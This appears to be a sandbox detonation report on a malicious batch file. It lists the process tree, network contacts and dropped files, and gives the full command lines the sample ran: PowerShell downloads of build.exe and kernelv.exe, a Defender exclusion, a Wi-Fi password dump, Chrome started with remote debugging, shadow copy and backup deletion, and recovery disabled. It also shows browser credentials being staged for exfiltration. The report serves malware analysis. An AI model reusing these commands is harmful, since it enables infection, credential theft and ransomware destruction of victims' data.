PID 4876 wrote to memory of 2844 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | 2
PID 4876 wrote to memory of 2944 | N/A | C:\Windows\system32\cmd.exe | C:\Users\Admin\AppData\Local\Temp\build.exe | 2
PID 4876 wrote to memory of 4880 | N/A | C:\Windows\system32\cmd.exe | C:\Users\Admin\AppData\Local\Temp\kernelv.exe | 3
PID 4876 wrote to memory of 1660 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | 2
PID 4880 wrote to memory of 4576 | N/A | C:\Users\Admin\AppData\Local\Temp\kernelv.exe | C:\Windows\SysWOW64\cmd.exe | 3
PID 4576 wrote to memory of 2476 | N/A | C:\Windows\SysWOW64\cmd.exe | C:\Windows\SysWOW64\chcp.com | 3
PID 4576 wrote to memory of 3252 | N/A | C:\Windows\SysWOW64\cmd.exe | C:\Windows\SysWOW64\netsh.exe | 3
PID 4576 wrote to memory of 3428 | N/A | C:\Windows\SysWOW64\cmd.exe | C:\Windows\SysWOW64\findstr.exe | 3
PID 4880 wrote to memory of 1008 | N/A | C:\Users\Admin\AppData\Local\Temp\kernelv.exe | C:\Windows\SysWOW64\cmd.exe | 3
PID 2944 wrote to memory of 2036 | N/A | C:\Users\Admin\AppData\Local\Temp\build.exe | C:\Users\Admin\AppData\Roaming\svchost.exe | 2
PID 4880 wrote to memory of 1928 | N/A | C:\Users\Admin\AppData\Local\Temp\kernelv.exe | C:\Program Files\Google\Chrome\Application\chrome.exe | 2
PID 1928 wrote to memory of 1772 | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | C:\Program Files\Google\Chrome\Application\chrome.exe | 2
PID 1928 wrote to memory of 4752 | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | C:\Program Files\Google\Chrome\Application\chrome.exe | 2

(40 rows in the original, collapsed here by writer and target.) Every target is a process its writer had just created: the sandbox records the parent's writes into the new child's address space during process start-up, so this table is the process tree of the detonation rather than evidence of cross-process injection. Read as a tree:

cmd.exe (4876, running the batch file)
  net.exe (668) -> net1.exe (232)
  powershell.exe (3396, 5088, 2844, 1660)
  build.exe (2944) -> C:\Users\Admin\AppData\Roaming\svchost.exe (2036), the writer of the Startup, wallpaper and desktop.ini rows above
  kernelv.exe (4880)
    cmd.exe (4576, 32-bit) -> chcp.com (2476), netsh.exe (3252), findstr.exe (3428): the Wi-Fi profile dump
    cmd.exe (1008, 32-bit)
    chrome.exe (1928) -> chrome.exe (1772, 4752): the browser started by the stealer, consistent with the "Uses browser remote debugging" entry in the summary
PID 1928 wrote to memory of 2860 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 1928 wrote to memory of 2860 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 1928 wrote to memory of 2860 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 1928 wrote to memory of 2860 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 1928 wrote to memory of 2860 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 1928 wrote to memory of 2860 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 1928 wrote to memory of 2860 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 1928 wrote to memory of 2860 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 1928 wrote to memory of 2860 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 1928 wrote to memory of 2860 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 1928 wrote to memory of 2860 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 1928 wrote to memory of 2860 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 1928 wrote to memory of 2860 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 1928 wrote to memory of 2860 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 1928 wrote to memory of 2860 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 1928 wrote to memory of 2860 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 1928 wrote to memory of 2860 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 1928 wrote to memory of 2860 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 1928 wrote to memory of 2860 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 1928 wrote to memory of 2860 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 1928 wrote to memory of 2860 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 1928 wrote to memory of 2860 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 1928 wrote to memory of 2860 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 1928 wrote to memory of 2860 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe

Uses Task Scheduler COM API

persistence

Uses Volume Shadow Copy service COM API

ransomware

outlook_office_path

Description Indicator Process Target
Key opened \REGISTRY\USER\S-1-5-21-1136229799-3442283115-138161576-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Users\Admin\AppData\Local\Temp\kernelv.exe N/A

outlook_win_path

Description Indicator Process Target
Key opened \REGISTRY\USER\S-1-5-21-1136229799-3442283115-138161576-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Users\Admin\AppData\Local\Temp\kernelv.exe N/A

Processes

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\fix (4).bat"

C:\Windows\system32\net.exe

net session

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 session

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -NoProfile -ExecutionPolicy Bypass -Command "Set-MpPreference -ExclusionPath \"$env:TEMP\" -ErrorAction SilentlyContinue"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -NoProfile -ExecutionPolicy Bypass -Command "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; iwr -Uri \"https://github.com/nfdsafnsdl/login/releases/download/V1/build.exe\" -OutFile \"C:\Users\Admin\AppData\Local\Temp\build.exe\" -ErrorAction Stop"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -NoProfile -ExecutionPolicy Bypass -Command "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; iwr -Uri \"https://github.com/nfdsafnsdl/login/releases/download/V1/kernelv.exe\" -OutFile \"C:\Users\Admin\AppData\Local\Temp\kernelv.exe\" -ErrorAction Stop"

C:\Users\Admin\AppData\Local\Temp\build.exe

"C:\Users\Admin\AppData\Local\Temp\build.exe"

C:\Users\Admin\AppData\Local\Temp\kernelv.exe

"C:\Users\Admin\AppData\Local\Temp\kernelv.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -NoProfile -ExecutionPolicy Bypass -Command "Remove-MpPreference -ExclusionPath \"$env:TEMP\" -ErrorAction SilentlyContinue"

C:\Windows\SysWOW64\cmd.exe

"cmd.exe" /C chcp 65001 && netsh wlan show profile | findstr All

C:\Windows\SysWOW64\chcp.com

chcp 65001

C:\Windows\SysWOW64\netsh.exe

netsh wlan show profile

C:\Windows\SysWOW64\findstr.exe

findstr All

C:\Windows\SysWOW64\cmd.exe

"cmd.exe" /C chcp 65001 && netsh wlan show networks mode=bssid

C:\Windows\SysWOW64\chcp.com

chcp 65001

C:\Windows\SysWOW64\netsh.exe

netsh wlan show networks mode=bssid

C:\Users\Admin\AppData\Roaming\svchost.exe

"C:\Users\Admin\AppData\Roaming\svchost.exe"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --window-position=-2400,-2400 --remote-debugging-port=9222 --profile-directory="Default"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=133.0.6943.60 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffe30fbdcf8,0x7ffe30fbdd04,0x7ffe30fbdd10

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --string-annotations --field-trial-handle=1448,i,14137480744260120977,5946941764742743460,262144 --variations-seed-version=20250313-050105.095000 --mojo-platform-channel-handle=2152 /prefetch:11

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --string-annotations --gpu-preferences=UAAAAAAAAADgAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --field-trial-handle=2172,i,14137480744260120977,5946941764742743460,262144 --variations-seed-version=20250313-050105.095000 --mojo-platform-channel-handle=2168 /prefetch:2

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --string-annotations --field-trial-handle=2304,i,14137480744260120977,5946941764742743460,262144 --variations-seed-version=20250313-050105.095000 --mojo-platform-channel-handle=2328 /prefetch:13

C:\Program Files\Google\Chrome\Application\133.0.6943.60\elevation_service.exe

"C:\Program Files\Google\Chrome\Application\133.0.6943.60\elevation_service.exe"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9222 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3292,i,14137480744260120977,5946941764742743460,262144 --variations-seed-version=20250313-050105.095000 --mojo-platform-channel-handle=3340 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9222 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3300,i,14137480744260120977,5946941764742743460,262144 --variations-seed-version=20250313-050105.095000 --mojo-platform-channel-handle=3360 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --extension-process --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9222 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4264,i,14137480744260120977,5946941764742743460,262144 --variations-seed-version=20250313-050105.095000 --mojo-platform-channel-handle=4300 /prefetch:9

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9222 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --field-trial-handle=4772,i,14137480744260120977,5946941764742743460,262144 --variations-seed-version=20250313-050105.095000 --mojo-platform-channel-handle=4756 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=4892,i,14137480744260120977,5946941764742743460,262144 --variations-seed-version=20250313-050105.095000 --mojo-platform-channel-handle=4928 /prefetch:14

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=5032,i,14137480744260120977,5946941764742743460,262144 --variations-seed-version=20250313-050105.095000 --mojo-platform-channel-handle=5044 /prefetch:14

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C vssadmin delete shadows /all /quiet & wmic shadowcopy delete

C:\Windows\system32\vssadmin.exe

vssadmin delete shadows /all /quiet

C:\Windows\system32\vssvc.exe

C:\Windows\system32\vssvc.exe

C:\Windows\System32\Wbem\WMIC.exe

wmic shadowcopy delete

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no

C:\Windows\system32\bcdedit.exe

bcdedit /set {default} bootstatuspolicy ignoreallfailures

C:\Windows\system32\bcdedit.exe

bcdedit /set {default} recoveryenabled no

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C wbadmin delete catalog -quiet

C:\Windows\system32\wbadmin.exe

wbadmin delete catalog -quiet

C:\Windows\system32\wbengine.exe

"C:\Windows\system32\wbengine.exe"

C:\Windows\System32\vdsldr.exe

C:\Windows\System32\vdsldr.exe -Embedding

C:\Windows\System32\vds.exe

C:\Windows\System32\vds.exe

C:\Windows\system32\BackgroundTransferHost.exe

"BackgroundTransferHost.exe" -ServerName:BackgroundTransferHost.13

C:\Windows\system32\NOTEPAD.EXE

"C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\AppData\Roaming\readme.txt

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.110.133:443 objects.githubusercontent.com tcp
GB 20.26.156.215:443 github.com tcp
US 185.199.110.133:443 objects.githubusercontent.com tcp
US 34.117.59.81:443 ipinfo.io tcp
US 104.26.0.100:443 get.geojs.io tcp
GB 142.250.179.228:443 www.google.com udp
GB 142.250.179.228:443 www.google.com tcp
GB 104.86.110.104:443 tcp
GB 142.250.179.238:443 apis.google.com udp
GB 216.58.212.206:443 play.google.com udp
GB 216.58.212.206:443 play.google.com udp
US 147.185.221.26:12171 tcp
US 147.185.221.26:12171 tcp
N/A 127.0.0.1:9222 tcp
GB 95.100.153.157:443 www.bing.com tcp
N/A 127.0.0.1:9222 tcp
GB 142.250.180.3:80 c.pki.goog tcp

Files

memory/3396-0-0x00007FFE33433000-0x00007FFE33435000-memory.dmp

memory/3396-1-0x0000028AE9B40000-0x0000028AE9B62000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_gkdvpyjj.mwa.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/3396-10-0x00007FFE33430000-0x00007FFE33EF2000-memory.dmp

memory/3396-11-0x00007FFE33430000-0x00007FFE33EF2000-memory.dmp

memory/3396-12-0x00007FFE33430000-0x00007FFE33EF2000-memory.dmp

memory/3396-15-0x00007FFE33430000-0x00007FFE33EF2000-memory.dmp

memory/3396-16-0x00007FFE33430000-0x00007FFE33EF2000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

MD5 627073ee3ca9676911bee35548eff2b8
SHA1 4c4b68c65e2cab9864b51167d710aa29ebdcff2e
SHA256 85b280a39fc31ba1e15fb06102a05b8405ff3b82feb181d4170f04e466dd647c
SHA512 3c5f6c03e253b83c57e8d6f0334187dbdcdf4fa549eecd36cbc1322dca6d3ca891dc6a019c49ec2eafb88f82d0434299c31e4dfaab123acb42e0546218f311fb

memory/5088-18-0x00007FFE33430000-0x00007FFE33EF2000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 05b3cd21c1ec02f04caba773186ee8d0
SHA1 39e790bfe10abf55b74dfb3603df8fcf6b5e6edb
SHA256 911efc5cf9cbeb697543eb3242f5297e1be46dd6603a390140a9ff031ed9e1e8
SHA512 e751008b032394817beb46937fd93a73be97254c2be94dd42f22fb1306d2715c653ece16fa96eab1a3e73811936768cea6b37888437086fc6f3e3e793a2515eb

memory/5088-27-0x00007FFE33430000-0x00007FFE33EF2000-memory.dmp

memory/5088-31-0x00007FFE33430000-0x00007FFE33EF2000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 318b7468f95ad6548bb6b631a14863dd
SHA1 77e835ce5092cf8d6b04dbb42a2f4c66e63a1557
SHA256 dd795b9f7d426c42a8f35cda8e2223c41a5b41560cff651ae2ec89f9aeb16555
SHA512 0fe428f2607bceae4bd947417aa68dcff8eaf3bc328c88904fd0cc6a1b2e1ec9eda7fb216783476b811ea0a12199fea54751c9ba5e4d746c7c6f0a9a888ef76f

C:\Users\Admin\AppData\Local\Temp\build.exe

MD5 7605fb5c749eeea0b1b27fdaad78051c
SHA1 28388bf016af085bbcbacf8c516853942f6ec8d3
SHA256 466a92e378a95752870abddd6af278fba89c5fef2cb3adfe2c4c114b9bd7cd93
SHA512 1a3780652e092bd0be5c45cf034b2d0737324009c4d7d74e5cca193f75f285be85fa1631a68c6955566206dc3d51ba2dab9c4acfc74f9652ed2c04976ae3ee54

C:\Users\Admin\AppData\Local\Temp\kernelv.exe

MD5 3252df0bec85cdcd3668d703ceaf09ce
SHA1 672366ae8df248c078db68a226d1fbf564d2f8ea
SHA256 02fa2665e5759db60b61da15b757150eda402ff6063a30a855a337d813fe8229
SHA512 179cab2e7d2cdc2cadc7a20986751007c10e6650069152df23d13bc1fef9fe5e066356f21825a325d34ea091c2b4e0766df1fabee8797da11a73de18dc46370f

memory/2944-48-0x00000000007B0000-0x00000000007D8000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 dd3474e6a72c08266c25f196f78b13fd
SHA1 b70c6bbd7794b49b6b9afa6343987a7f553d1268
SHA256 82acd1c6613bb2c907a26be1f61f6556ee03cabf1aa73dad27d012be88e05318
SHA512 cf5138ab09f19034fa5d058819956fd0556c56d674268e496dbaded228839d2be576bd74cda26127adf03cce9a8ab485ce6a07c7332a2c65a77ca9b56d92c79d

memory/4880-59-0x0000000000F80000-0x0000000000FC4000-memory.dmp

memory/4880-60-0x00000000059D0000-0x00000000059E2000-memory.dmp

memory/4880-61-0x0000000005BC0000-0x0000000005D82000-memory.dmp

memory/4880-63-0x0000000006B40000-0x000000000706C000-memory.dmp

memory/4880-64-0x00000000072E0000-0x0000000007346000-memory.dmp

memory/4880-65-0x0000000007650000-0x00000000076E2000-memory.dmp

memory/4880-143-0x00000000080A0000-0x0000000008646000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\212.102.63.147\System\Process.txt

MD5 aaafa9bad52c6b8832bfe6049e3ea677
SHA1 7c079d194986f77a65bfa3d8f22168e9b584f477
SHA256 bd4bdcc0eb7b4567b94b146b2c36c5e4c423eb3606475b795c64171591fc31aa
SHA512 3d5420df3a27cc8aa9902294b8ae5990e3bdb718a71dc1387546a4b6db444a46d9db25401a391a2c50e0bf528870366fd98144eb5d0ebeb6b4dc7ee64cb91b9b

C:\Users\Admin\AppData\Local\Temp\212.102.63.147\Browsers\Firefox\FirefoxBookmarks.txt

MD5 ea511fc534efd031f852fcf490b76104
SHA1 573e5fa397bc953df5422abbeb1a52bf94f7cf00
SHA256 e5fe7f327ae62df007bd1117aa7f522dbbcd371ec67953f66d786424cb1d7995
SHA512 f7d8e575a2332b0fbd491b5e092b7ed6b0942a5165557fcc5d215d873b05103aa6ba01843133871c1c7ac81b10182a15895be49885c98d1a379dd55f88004fae

\??\pipe\crashpad_1928_VRLLFTIAFTAZQYCW

MD5 d41d8cd98f00b204e9800998ecf8427e
SHA1 da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512 cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

MD5 38e61cfd456cf804da8e5d148eacf796
SHA1 0350a98c12d3b1996feca7f0c52be22dcb6079b3
SHA256 0f9fbf41d1153581a399ba5a5b1a3b785a4351161d6d650d19165a43f64185d8
SHA512 96ac64dc5a0b4e9e4b5314d83a21ab725ed64d45579875bf8f4a62401d13c598b9f6535b431f55198983830daa750467153643a0140e15d9ec4377db043c5eae

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\SCT Auditing Pending Reports

MD5 d751713988987e9331980363e24189ce
SHA1 97d170e1550eee4afc0af065b78cda302a97674c
SHA256 4f53cda18c2baa0c0354bb5f9a3ecbe5ed12ab4d8e11ba873c2f11161202b945
SHA512 b25b294cb4deb69ea00a4c3cf3113904801b6015e5956bd019a8570b1fe1d6040e944ef3cdee16d0a46503ca6e659a25f21cf9ceddc13f352a3c98138c15d6af

C:\Users\Admin\readme.txt

MD5 60d646f40556d78166ad8111d850fc51
SHA1 babaaf0762000dbf4b3f7a93beb35b6d9279d94d
SHA256 a66f43f9660c0b16c59eb22b1037c19af06f89d875344446cc63e90437f78fab
SHA512 3fb8acd626a012402669e42e760dd5b0efe2d2a37f3e71310c4a80a14491ee973713fcb0d90f99d40f0749c1dd16e8153afcb757e25de34c9ec9c82a58e81bc6

C:\Users\Admin\2012_x64_1_vcRuntimeAdditional_x64.log

MD5 d1457b72c3fb323a2671125aef3eab5d
SHA1 5bab61eb53176449e25c2c82f172b82cb13ffb9d
SHA256 8a8de823d5ed3e12746a62ef169bcf372be0ca44f0a1236abc35df05d96928e1
SHA512 ca63c07ad35d8c9fb0c92d6146759b122d4ec5d3f67ebe2f30ddb69f9e6c9fd3bf31a5e408b08f1d4d9cd68120cced9e57f010bef3cde97653fed5470da7d1a0

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad\settings.dat

MD5 1d6d1e773c2cb63516dc875f48b6b40c
SHA1 80bcca5dd15ffceb74ffe8b17a31e5d46da41473
SHA256 2e7ec8cb08e6856724817c7e0a64c9f38118ceb1c4c79f751ac31640a9e230d1
SHA512 becd167da74904fbdf8540b4d3782bc20c4f8551afa7c6261d1a8fff797bb160a5e3334bef30dc79a4d5416700055623e3f279e8b4c4bc4c0041bc49d16cb119

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ghbmnnjooekpmoecnnnilnnbdlolhkhi\000003.log

MD5 e4a639b9d8bf7a90cc97bb4e05a36753
SHA1 676facdabf06e5f014e95218bfc02b8c18c39284
SHA256 79da0e95b23e5777bee595201fead887021d71ddaffa79dac8d5cf03a646b8cd
SHA512 4a254245e0af42a2a86647ed24301f4f82a72c0dedad67df32317c2acdb8a7f2e5db8336871611419776e6a1cc1c35933cc5f4cb16648b51b6a401a14087d104

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Service Worker\Database\000003.log

MD5 662e55efd63947ac1ed9ab166fde4448
SHA1 ffdefed29e194510e0c86cb9063c2b6bf4b87223
SHA256 45e102a0dd571dc77afbf39c16f4007c44d643c58168b299f3a69a4769fb3793
SHA512 60b54ae86eb59911b0c2bd5f2420961fceaac2e3140039c9139c65902dfbf63eb8f19dec2ac4674d6c6b3dd2b4082e461bc53556912f7eb8f634d66c17cc0d1a

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Session Storage\000003.log

MD5 541c42f1c98b3e1b011d22eba854e707
SHA1 db30188de1f22e3077e7044be1386a5d0ecaed9d
SHA256 0768e811c51ac61a8e573ac6b53f89dbb1d89eb2fcf62536a9a5f730329c584b
SHA512 47828c1b40deb8d37d6ff4fc8f7673fbb59b40e07f54f0fa4121b91941160134c251e20f7f28f7ee5185f3c8aee2b7e95a1bef573bc64c68912016accbe90604

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\shared_proto_db\000003.log

MD5 4786cf24e3e07c212272a4c2c0aa6aad
SHA1 6948ce944e1dde09aafee35b61b7fee15537a785
SHA256 01637344a86333f59012fe115b1be0a8366587e176809918a2723a6878a23cdc
SHA512 6434ad876770eb4bb9e91c4ebb206c41f3b4d0d715ec363c8669d4b595fdd740ac3004855d482c71588f1f7bd4762d427974a4fce31dc50ad633d84d4f132654

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\shared_proto_db\metadata\000003.log

MD5 56220f7b661c85b776763c1a0f189326
SHA1 64e8d4898867dafa9de8b87862808a1ac05a1239
SHA256 6371d04275f796eebfdf9ab3c879f32a58af4cb04001598b8d109836b864b872
SHA512 3071338a1f5c80016f409105efd2367baa4f3742bdaaf41a97794f66670f246ff24f3c11c2fc26e5d33c17f33c3d19a2301fcf4be8ca239f0a903c3b8a2892db

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\build.exe.log

MD5 4ae344179932dc8e2c6fe2079f9753ef
SHA1 60eacc624412b1f34809780769e3b212f138ea9c
SHA256 3063de3898a9b34e19f8cf0beeec2b8bd6bd05896b52abd73f4703d07b8a7cd4
SHA512 fadfe2b83f1af8fdc50430325f69d6172d2c1e889ca3800b3b83e5535d5970c32e9a176b48563275a0630d56c96d9f88df148fd6b2d281f0fc58129e5f4dba19

C:\Users\Admin\AppData\Local\Temp\212.102.63.147.zip

MD5 b077dab664a004215814a4391b6dde66
SHA1 c3c2f1138317225ae98f616b080370cefa082c18
SHA256 726afcaa627b24e176cec78f636df4a66847f0716ea0e1161745d0c5616b5bae
SHA512 2927dd7361048783dba4324def7859b72b415045272278064dbfb024251b22e899e7b4f603f2b59d312855a9674c6ad2d2068eee7811e7079bc00a91fc5cc247

C:\Users\Admin\AppData\Local\Temp\212.102.63.147\System\Process.txt

MD5 368d379c84bd87dc5750b0a91088f604
SHA1 3949b00b0abddba67fe05fb8f1c02b22c519eca4
SHA256 75e31026665a23adfaebf4ab95f2f5e45f59500c0dcc762502bb4a234b5dbcbf
SHA512 9074f42972b6e523ba89528d3a6b147ca5cafedb16920a612306a6c9bb764dd09320fb8d05df1aa34e85d72e59ab32d537900dffb86a00aadceec4ddd94150cd

C:\Users\Admin\AppData\Local\Temp\212.102.63.147\System\Info.txt

MD5 20a03bf7481ae6484d0623abb566212c
SHA1 08e6067ea2ec07126473066a53855d1f743718bd
SHA256 44cdd1e35dba8a35672a3f58067b50932f4088298f5e1ecf9a448b3e73380ee7
SHA512 e3d12f0c103268ae5030345e38c49daa90f6e41c9d9b6294fe97fa0e0032c732682f6e27356ffbbf1611c3e8482dfccefc0859444d054fcbc3c826d649b8dd34

C:\Users\Admin\AppData\Local\Temp\212.102.63.147\Browsers\Edge\EdgePasswords.txt

MD5 c4efd9a7b61ebf43b608440be5e33369
SHA1 926418256c277f1b11b575ec6e92ce6a844612f7
SHA256 ed4280859199da5a8f25c0c6d533d0873460ac63368c14a69bbd863ea4bfb30f
SHA512 9ea97363868d61d3d51bd3804d638b71ba8dc65260800b3a54051b4725cf08e9d9880a12422a549d94a339c7267e858a7ff5ca9428d64051657134b5c6c20745

C:\Users\Admin\AppData\Local\Temp\212.102.63.147\Browsers\Edge\EdgeHistory.txt

MD5 b80546283f231ee762dee4b33b0aa091
SHA1 ec5a0f5581d8d9e9784f82b77e4e0eb187d78301
SHA256 188352fe4a40938e0918eed1c4b0ae7266fb13c9de77330e04f192711d15c6f8
SHA512 df1519614443b80b22a601ca4f1b4119eeaef0715fe913dd327a7c247986cba16cbbd7f55e32ea0557b5e5338897c0f82ac23e91d69836ad280c7f587d863d51

